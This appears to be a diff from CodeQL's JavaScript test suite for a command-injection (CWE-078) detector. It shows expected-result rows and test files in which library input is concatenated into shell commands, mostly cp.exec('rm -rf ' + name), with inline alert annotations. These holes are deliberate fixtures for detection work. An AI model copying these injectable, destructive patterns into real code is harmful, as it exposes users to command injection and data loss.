| name | lib/lib.js:69:27:69:30 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:69:2:69:48 | cp.exec ... a end") | shell command | -| lib/lib.js:71:10:71:31 | "cat /f ... + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:71:2:71:32 | cp.exec ... + name) | shell command | -| lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | lib/lib.js:64:41:64:44 | name | lib/lib.js:73:21:73:24 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | shell command | -| lib/lib.js:75:10:75:29 | "cat '" + name + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:75:20:75:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:75:2:75:30 | cp.exec ... + "'") | shell command | -| lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:77:28:77:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:77:2:77:38 | cp.exec ... + "'") | shell command | -| lib/lib.js:83:10:83:25 | "rm -rf " + name | lib/lib.js:82:35:82:38 | name | lib/lib.js:83:22:83:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:83:2:83:26 | cp.exec ... + name) | shell command | -| lib/lib.js:86:13:86:16 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:86:13:86:16 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | shell command | -| lib/lib.js:89:21:89:24 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:89:21:89:24 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) | shell command | -| lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | lib/lib.js:82:35:82:38 | name | lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | shell command | -| lib/lib.js:98:35:98:38 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:98:35:98:38 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:98:2:98:40 | cp.exec ... name)) | shell command | -| lib/lib.js:100:37:100:40 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:100:37:100:40 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:100:2:100:42 | cp.exec ... name)) | shell command | -| lib/lib.js:102:46:102:49 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:102:46:102:49 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:102:2:102:51 | cp.exec ... name)) | shell command | -| lib/lib.js:108:41:108:44 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:108:41:108:44 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:108:2:108:46 | cp.exec ... name)) | shell command | -| lib/lib.js:112:10:112:25 | "rm -rf " + name | lib/lib.js:111:34:111:37 | name | lib/lib.js:112:22:112:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:111:34:111:37 | name | library input | lib/lib.js:112:2:112:26 | cp.exec ... + name) | shell command | -| lib/lib.js:121:10:121:25 | "rm -rf " + name | lib/lib.js:120:33:120:36 | name | lib/lib.js:121:22:121:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:120:33:120:36 | name | library input | lib/lib.js:121:2:121:26 | cp.exec ... + name) | shell command | -| lib/lib.js:131:11:131:26 | "rm -rf " + name | lib/lib.js:130:6:130:9 | name | lib/lib.js:131:23:131:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:130:6:130:9 | name | library input | lib/lib.js:131:3:131:27 | cp.exec ... + name) | shell command | -| lib/lib.js:149:12:149:27 | "rm -rf " + name | lib/lib.js:148:37:148:40 | name | lib/lib.js:149:24:149:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:148:37:148:40 | name | library input | lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | shell command | -| lib/lib.js:161:13:161:28 | "rm -rf " + name | lib/lib.js:155:38:155:41 | name | lib/lib.js:161:25:161:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:155:38:155:41 | name | library input | lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | shell command | -| lib/lib.js:173:10:173:23 | "fo \| " + name | lib/lib.js:170:41:170:44 | name | lib/lib.js:173:20:173:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:170:41:170:44 | name | library input | lib/lib.js:173:2:173:24 | cp.exec ... + name) | shell command | -| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | lib/lib.js:177:38:177:41 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | -| lib/lib.js:182:10:182:27 | "rm -rf " + broken | lib/lib.js:177:38:177:41 | name | lib/lib.js:182:22:182:27 | broken | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | -| lib/lib.js:187:10:187:25 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:187:2:187:26 | cp.exec ... + name) | shell command | -| lib/lib.js:190:11:190:26 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:190:23:190:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:190:3:190:27 | cp.exec ... + name) | shell command | -| lib/lib.js:197:10:197:25 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:197:22:197:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:197:2:197:26 | cp.exec ... + name) | shell command | -| lib/lib.js:200:11:200:26 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:200:23:200:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:200:3:200:27 | cp.exec ... + name) | shell command | -| lib/lib.js:207:10:207:25 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:207:22:207:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:207:2:207:26 | cp.exec ... + name) | shell command | -| lib/lib.js:212:11:212:26 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:212:23:212:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:212:3:212:27 | cp.exec ... + name) | shell command | -| lib/lib.js:217:10:217:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:217:22:217:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:217:2:217:26 | cp.exec ... + name) | shell command | -| lib/lib.js:220:11:220:26 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:220:23:220:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:220:3:220:27 | cp.exec ... + name) | shell command | -| lib/lib.js:224:10:224:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:224:22:224:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:224:2:224:26 | cp.exec ... + name) | shell command | -| lib/lib.js:228:10:228:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:228:22:228:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:228:2:228:26 | cp.exec ... + name) | shell command | -| lib/lib.js:236:10:236:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:236:22:236:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:236:2:236:26 | cp.exec ... + name) | shell command | -| lib/lib.js:249:10:249:25 | "rm -rf " + name | lib/lib.js:248:42:248:45 | name | lib/lib.js:249:22:249:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:249:2:249:26 | cp.exec ... + name) | shell command | -| lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | lib/lib.js:248:42:248:45 | name | lib/lib.js:253:22:253:28 | cleaned | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:253:2:253:29 | cp.exec ... leaned) | shell command | -| lib/lib.js:258:10:258:25 | "rm -rf " + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:258:22:258:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:258:2:258:26 | cp.exec ... + name) | shell command | -| lib/lib.js:261:11:261:33 | "rm -rf ... + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:261:30:261:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:261:3:261:34 | cp.exec ... + name) | shell command | -| lib/lib.js:268:10:268:32 | "rm -rf ... version | lib/lib.js:267:46:267:48 | obj | lib/lib.js:268:22:268:32 | obj.version | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:267:46:267:48 | obj | library input | lib/lib.js:268:2:268:33 | cp.exec ... ersion) | shell command | -| lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:277:23:277:30 | opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | shell command | -| lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:281:23:281:35 | this.opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | shell command | -| lib/lib.js:308:11:308:26 | "rm -rf " + name | lib/lib.js:307:39:307:42 | name | lib/lib.js:308:23:308:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:307:39:307:42 | name | library input | lib/lib.js:308:3:308:27 | cp.exec ... + name) | shell command | -| lib/lib.js:315:10:315:25 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:315:22:315:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:315:2:315:26 | cp.exec ... + name) | shell command | -| lib/lib.js:320:11:320:26 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:320:23:320:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:320:3:320:27 | cp.exec ... + name) | shell command | -| lib/lib.js:325:12:325:51 | "MyWind ... " + arg | lib/lib.js:324:40:324:42 | arg | lib/lib.js:325:49:325:51 | arg | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:324:40:324:42 | arg | library input | lib/lib.js:326:2:326:13 | cp.exec(cmd) | shell command | -| lib/lib.js:340:10:340:26 | "rm -rf " + id(n) | lib/lib.js:339:39:339:39 | n | lib/lib.js:340:22:340:26 | id(n) | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:339:39:339:39 | n | library input | lib/lib.js:340:2:340:27 | cp.exec ... id(n)) | shell command | -| lib/lib.js:351:10:351:27 | "rm -rf " + unsafe | lib/lib.js:349:29:349:34 | unsafe | lib/lib.js:351:22:351:27 | unsafe | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:349:29:349:34 | unsafe | library input | lib/lib.js:351:2:351:28 | cp.exec ... unsafe) | shell command | -| lib/lib.js:406:10:406:25 | "rm -rf " + name | lib/lib.js:405:39:405:42 | name | lib/lib.js:406:22:406:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:405:39:405:42 | name | library input | lib/lib.js:406:2:406:26 | cp.exec ... + name) | shell command | -| lib/lib.js:415:10:415:25 | "rm -rf " + name | lib/lib.js:414:40:414:43 | name | lib/lib.js:415:22:415:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:415:2:415:26 | cp.exec ... + name) | shell command | -| lib/lib.js:417:28:417:31 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:417:28:417:31 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:417:2:417:66 | cp.exec ... => {}) | shell command | -| lib/lib.js:418:25:418:28 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:418:25:418:28 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:418:2:418:45 | cp.spaw ... true}) | shell command | -| lib/lib.js:419:32:419:35 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:419:32:419:35 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:419:2:419:52 | cp.exec ... true}) | shell command | -| lib/lib.js:420:29:420:32 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:420:29:420:32 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:420:2:420:49 | cp.spaw ... true}) | shell command | -| lib/lib.js:424:24:424:27 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:424:24:424:27 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:426:11:426:14 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:426:11:426:14 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:427:14:427:16 | arr | lib/lib.js:414:40:414:43 | name | lib/lib.js:427:14:427:16 | arr | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:428:14:428:58 | build(" ... + '-') | lib/lib.js:414:40:414:43 | name | lib/lib.js:428:14:428:58 | build(" ... + '-') | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:436:19:436:22 | last | lib/lib.js:414:40:414:43 | name | lib/lib.js:436:19:436:22 | last | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | -| lib/lib.js:442:12:442:27 | "rm -rf " + name | lib/lib.js:441:39:441:42 | name | lib/lib.js:442:24:442:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:441:39:441:42 | name | library input | lib/lib.js:442:2:442:28 | asyncEx ... + name) | shell command | -| lib/lib.js:447:13:447:28 | "rm -rf " + name | lib/lib.js:446:20:446:23 | name | lib/lib.js:447:25:447:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:446:20:446:23 | name | library input | lib/lib.js:447:3:447:29 | asyncEx ... + name) | shell command | -| lib/lib.js:478:27:478:46 | config.installedPath | lib/lib.js:477:33:477:38 | config | lib/lib.js:478:27:478:46 | config.installedPath | This path concatenation which depends on $@ is later used in a $@. | lib/lib.js:477:33:477:38 | config | library input | lib/lib.js:479:12:479:20 | exec(cmd) | shell command | -| lib/lib.js:483:13:483:33 | ' my na ... + name | lib/lib.js:482:40:482:43 | name | lib/lib.js:483:30:483:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:482:40:482:43 | name | library input | lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | shell command | -| lib/lib.js:499:19:499:34 | "rm -rf " + name | lib/lib.js:498:45:498:48 | name | lib/lib.js:499:31:499:34 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:498:45:498:48 | name | library input | lib/lib.js:499:3:499:35 | MyThing ... + name) | shell command | -| lib/lib.js:510:10:510:25 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:510:22:510:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:510:2:510:26 | cp.exec ... + name) | shell command | -| lib/lib.js:513:11:513:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:513:23:513:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:513:3:513:27 | cp.exec ... + name) | shell command | -| lib/lib.js:519:11:519:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:519:23:519:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:519:3:519:27 | cp.exec ... + name) | shell command | -| lib/lib.js:525:11:525:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:525:23:525:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:525:3:525:27 | cp.exec ... + name) | shell command | -| lib/lib.js:531:11:531:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:531:23:531:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:531:3:531:27 | cp.exec ... + name) | shell command | -| lib/lib.js:537:11:537:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:537:23:537:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:537:3:537:27 | cp.exec ... + name) | shell command | -| lib/lib.js:543:11:543:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:543:23:543:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:543:3:543:27 | cp.exec ... + name) | shell command | -| lib/lib.js:545:11:545:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:545:23:545:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:545:3:545:27 | cp.exec ... + name) | shell command | -| lib/lib.js:552:23:552:26 | args | lib/lib.js:550:39:550:42 | name | lib/lib.js:552:23:552:26 | args | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | -| lib/lib.js:555:33:555:36 | name | lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | -| lib/lib.js:560:14:560:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:560:26:560:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:560:9:560:30 | exec("r ... + name) | shell command | -| lib/lib.js:562:14:562:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:562:26:562:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:562:9:562:30 | exec("r ... + name) | shell command | -| lib/lib.js:566:14:566:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:566:26:566:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:566:9:566:30 | exec("r ... + name) | shell command | -| lib/lib.js:573:10:573:25 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:573:22:573:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:573:2:573:26 | cp.exec ... + name) | shell command | -| lib/lib.js:579:13:579:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:579:25:579:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:579:5:579:29 | cp.exec ... + name) | shell command | -| lib/lib.js:590:17:590:32 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:590:29:590:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:590:9:590:33 | cp.exec ... + name) | shell command | -| lib/lib.js:593:13:593:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:593:25:593:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:593:5:593:29 | cp.exec ... + name) | shell command | -| lib/lib.js:609:10:609:25 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:609:22:609:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:609:2:609:26 | cp.exec ... + name) | shell command | -| lib/lib.js:626:17:626:32 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:626:29:626:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:626:9:626:33 | cp.exec ... + name) | shell command | -| lib/lib.js:629:13:629:28 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:629:25:629:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:629:5:629:29 | cp.exec ... + name) | shell command | -| lib/lib.js:633:18:633:68 | "'" + n ... ) + "'" | lib/lib.js:632:38:632:41 | name | lib/lib.js:633:24:633:62 | name.re ... '\\\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | -| lib/lib.js:634:10:634:30 | "rm -rf ... nitized | lib/lib.js:632:38:632:41 | name | lib/lib.js:634:22:634:30 | sanitized | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | -| lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | lib/subLib2/compiled-file.ts:3:26:3:29 | name | lib/subLib2/compiled-file.ts:4:25:4:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/compiled-file.ts:3:26:3:29 | name | library input | lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | shell command | -| lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | lib/subLib2/special-file.js:3:28:3:31 | name | lib/subLib2/special-file.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/special-file.js:3:28:3:31 | name | library input | lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | lib/subLib3/my-file.ts:3:28:3:31 | name | lib/subLib3/my-file.ts:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib3/my-file.ts:3:28:3:31 | name | library input | lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | lib/subLib4/index.js:6:32:6:35 | name | lib/subLib4/subsub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib4/index.js:6:32:6:35 | name | library input | lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | lib/subLib/amdSub.js:3:28:3:31 | name | lib/subLib/amdSub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/amdSub.js:3:28:3:31 | name | library input | lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | lib/subLib/index.js:3:28:3:31 | name | lib/subLib/index.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:3:28:3:31 | name | library input | lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | lib/subLib/index.js:7:32:7:35 | name | lib/subLib/index.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:7:32:7:35 | name | library input | lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | shell command | -| lib/subLib/index.js:14:22:14:24 | arr | lib/subLib/index.js:13:44:13:46 | arr | lib/subLib/index.js:14:22:14:24 | arr | This shell argument which depends on $@ is later used in a $@. | lib/subLib/index.js:13:44:13:46 | arr | library input | lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | shell command | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref index f1dbca0e19c9..26c43ff16ca6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref @@ -1 +1,2 @@ -Security/CWE-078/UnsafeShellCommandConstruction.ql \ No newline at end of file +query: Security/CWE-078/UnsafeShellCommandConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 116b624615b1..b4f75df03ac4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -2,6 +2,6 @@ const cp = require("child_process"); -module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.thisMethodIsImported = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 75fda0090000..85d0402a8ae8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -1,134 +1,134 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.blah = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.execFile(name, [name]); // OK - cp.execFile(name, name); // OK + cp.execFile(name, [name]); + cp.execFile(name, name); }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.foo.bar = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } function cla() { } -cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK +cla.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports = new cla(); +module.exports.cla = new cla(); function cla2() { } -cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK +cla2.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.bla = new cla2(); module.exports.lib2 = require("./lib2.js") class Cla3 { - constructor(name) { - cp.exec("rm -rf " + name); // NOT OK + constructor(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - static foo(name) { - cp.exec("rm -rf " + name); // NOT OK + static foo(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - bar(name) { - cp.exec("rm -rf " + name); // NOT OK + bar(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.exec("rm -rf " + notASource); // OK + cp.exec("rm -rf " + notASource); } } module.exports.cla3 = Cla3; 